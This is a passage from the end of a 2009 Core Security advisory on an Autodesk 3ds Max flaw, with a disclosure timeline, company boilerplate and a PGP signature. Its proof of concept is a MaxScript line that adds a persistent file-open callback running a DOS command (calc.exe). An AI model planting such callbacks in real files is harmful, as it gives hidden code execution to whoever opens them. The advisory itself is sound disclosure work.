Concept file can be obtained by following these simple -steps. Open Max, press F11 (MaxScript Listener), and paste this code: - -/----- - callbacks.addScript #filePostOpen ("DOSCommand(\"calc.exe\")") -id:#mbLoadCallback persistent:true - -- -----/ - - - -8. *Report Timeline* - -. 2009-08-25: -Core Security Technologies ask the Autodesk Assistance Team for a -security contact to report the vulnerability. - -. 2009-09-22: -Core asks the Autodesk Assistance Team for a security contact to -report the vulnerability. - -. 2009-10-09: -Core contacts CERT to obtain security contact information for Autodesk. - -. 2009-10-16: -CERT acknowledges the communication. - -. 2009-10-19: -CERT sends their available contact information for Autodesk. - -. 2009-10-19: -Core notifies Autodesk of the vulnerabilty report and announces its -initial plan to publish the content on November 2nd, 2009. Core -requests an acknoledgement within two working days and asks whehter -the details should be sent encrypted or in plaintext. - -. 2009-10-19: -Autodesk acknowledges the report and requests the information to be -provided in encrypted form. - -. 2009-10-20: -Core sends draft advisory and steps to reproduce the issue. - -. 2009-10-27: -Core asks Autodesk about the status of the vulnerability report sent -on October 20th, 2009. - -. 2009-10-27: -Autodesk acknowledges the communication indicating that the pertinent -Product Managers have been informed and are formulating a response. - -. 2009-11-06: -Core notifies Autodesk about the missed deadline of November 2nd, 2009 -and reuqests an status update. Publication of CORE-2009-0909 is -re-scheduled to November 16th, 2009 and is subject to change based on -concrete feedback from Autodesk. - -. 2009-11-23: -Given the lack of response from Autodesk, Core decides to publish the -advisory CORE-2009-0909 as "user release". - - - -9. *References* - -[1] The author participated in Core Bugweek 2009 as member of the team -"Gimbal Lock N Load". -[2] -http://usa.autodesk.com/adsk/servlet/pc/index?id=13567410&siteID=123112 - - -10. *About CoreLabs* - -CoreLabs, the research center of Core Security Technologies, is -charged with anticipating the future needs and requirements for -information security technologies. We conduct our research in several -important areas of computer security including system vulnerabilities, -cyber attack planning and simulation, source code auditing, and -cryptography. Our results include problem formalization, -identification of vulnerabilities, novel solutions and prototypes for -new technologies. CoreLabs regularly publishes security advisories, -technical papers, project information and shared software tools for -public use at: http://www.coresecurity.com/corelabs. - - -11. *About Core Security Technologies* - -Core Security Technologies develops strategic solutions that help -security-conscious organizations worldwide develop and maintain a -proactive process for securing their networks. The company's flagship -product, CORE IMPACT, is the most comprehensive product for performing -enterprise security assurance testing. CORE IMPACT evaluates network, -endpoint and end-user vulnerabilities and identifies what resources -are exposed. It enables organizations to determine if current security -investments are detecting and preventing attacks. Core Security -Technologies augments its leading technology solution with world-class -security consulting services, including penetration testing and -software security auditing. Based in Boston, MA and Buenos Aires, -Argentina, Core Security Technologies can be reached at 617-399-6980 -or on the Web at http://www.coresecurity.com. - - -12. *Disclaimer* - -The contents of this advisory are copyright (c) 2009 Core Security -Technologies and (c) 2009 CoreLabs, and may be distributed freely -provided that no fee is charged for this distribution and proper -credit is given. - - -13. *PGP/GPG Keys* - -This advisory has been signed with the GPG key of Core Security -Technologies advisories team, which is available for download at -http://www.coresecurity.com/files/attachments/core_security_advisories.asc. - ------BEGIN PGP SIGNATURE----- -Version: GnuPG v2.0.12 (MingW32) -Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ - -iEYEARECAAYFAksK5boACgkQyNibggitWa1jTgCgsSlNJKsbVSRtXaFylOQNbpCN -TPwAn1AMCamFLaX3gHyUys//tHcyhlvn -=fPrL ------END PGP SIGNATURE----- -